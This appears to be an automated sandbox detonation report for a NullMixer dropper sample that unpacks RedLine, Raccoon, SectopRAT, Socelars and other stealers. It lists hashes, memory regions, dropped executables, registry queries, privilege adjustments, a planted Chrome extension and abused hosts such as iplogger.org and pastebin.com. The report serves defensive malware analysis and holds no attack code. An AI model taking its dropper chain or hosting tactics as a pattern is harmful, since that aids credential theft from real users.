SHA512 da6ac858c46cb1f8dd68f03e4550c645c85753d0de4dc0752494c737f4d433bb0e40a5a9de336e211c2e06aa9c6a30484f76baef6892d6a8860f558d1d90f580

C:\Users\Admin\AppData\Local\Temp\is-K6GVP.tmp\Wed09a6fb1d0dd846.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/2952-151-0x0000000000090000-0x0000000000098000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-GR96V.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/2420-147-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1084-145-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2296-144-0x0000000000400000-0x00000000004BD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-GR96V.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/872-159-0x0000000001380000-0x00000000013F0000-memory.dmp

memory/2924-162-0x0000000000030000-0x0000000000046000-memory.dmp

memory/2176-161-0x0000000000CB0000-0x0000000000D22000-memory.dmp

memory/2708-160-0x0000000000F00000-0x0000000000F70000-memory.dmp

memory/2924-165-0x0000000000360000-0x0000000000366000-memory.dmp

memory/2660-182-0x0000000002560000-0x00000000026BD000-memory.dmp

memory/1552-219-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1552-218-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1552-217-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1552-216-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1452-215-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1452-214-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1552-212-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1552-210-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1552-208-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1452-205-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1452-204-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1452-202-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1452-200-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1452-198-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1692-195-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1692-193-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1692-192-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1692-191-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1692-189-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1692-185-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1692-183-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1692-187-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2808-220-0x0000000000400000-0x000000000051C000-memory.dmp

memory/2808-229-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2808-228-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2808-227-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2808-226-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2808-224-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2660-230-0x00000000029D0000-0x0000000002A76000-memory.dmp

memory/2660-234-0x0000000002A80000-0x0000000002B13000-memory.dmp

memory/2660-232-0x0000000002A80000-0x0000000002B13000-memory.dmp

memory/2660-231-0x0000000002A80000-0x0000000002B13000-memory.dmp

memory/2644-235-0x0000000000400000-0x0000000002DAA000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win10v2004-20241007-en

Max time kernel

120s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe"

Signatures

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

Raccoon

stealer raccoon

Raccoon Stealer V1 payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Raccoon family

raccoon

RedLine

infostealer redline

RedLine payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

OnlyLogger payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Command and Scripting Interpreter: PowerShell

execution

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

ASPack v2.12-2.42

aspackv2

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue193858933525b62.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-8JCES.tmp\Tue19879c4c0e.tmp | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c06f159e0ec.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c1338f41ab.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19325eb008c0b950.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c78ded4d176ac.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue192762f1cd058ddf8.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue1969586bcbf58493.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue1993b3f72c.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19879c4c0e.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19150ee2be694c8a4.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue193858933525b62.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19411ac950924ec3f.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19f51bcd77a.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-8JCES.tmp\Tue19879c4c0e.tmp | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19879c4c0e.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-4EH6A.tmp\Tue19879c4c0e.tmp | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19f51bcd77a.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe | N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A

Drops Chrome extension

Description | Indicator | Process | Target
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | iplogger.org | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | pastebin.com | N/A | N/A
N/A | iplogger.org | N/A | N/A
N/A | iplogger.org | N/A | N/A
N/A | iplogger.org | N/A | N/A

Looks up geolocation information via web service

Drops file in Program Files directory

Description | Indicator | Process | Target
File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19150ee2be694c8a4.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19879c4c0e.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19f51bcd77a.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue193858933525b62.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue1993b3f72c.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c06f159e0ec.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-4EH6A.tmp\Tue19879c4c0e.tmp | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19411ac950924ec3f.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19879c4c0e.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c1338f41ab.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19f51bcd77a.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-8JCES.tmp\Tue19879c4c0e.tmp | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue1969586bcbf58493.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19325eb008c0b950.exe | N/A

Checks SCSI registry key(s)

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\dwm.exe | N/A
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\dwm.exe | N/A
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c1338f41ab.exe | N/A
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c1338f41ab.exe | N/A
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\dwm.exe | N/A
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\dwm.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c1338f41ab.exe | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\dwm.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\system32\dwm.exe | N/A

Kills process with taskkill

evasion

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A

Modifies data under HKEY_USERS

Description | Indicator | Process | Target
Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133757331540431966" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E | C:\Windows\system32\dwm.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\dwm.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\dwm.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache | C:\Windows\system32\dwm.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\system32\dwm.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Windows\system32\dwm.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies | C:\Windows\system32\dwm.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft | C:\Windows\system32\dwm.exe | N/A
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeCreateTokenPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
Token: SeMachineAccountPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
Token: SeTcbPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe | N/A
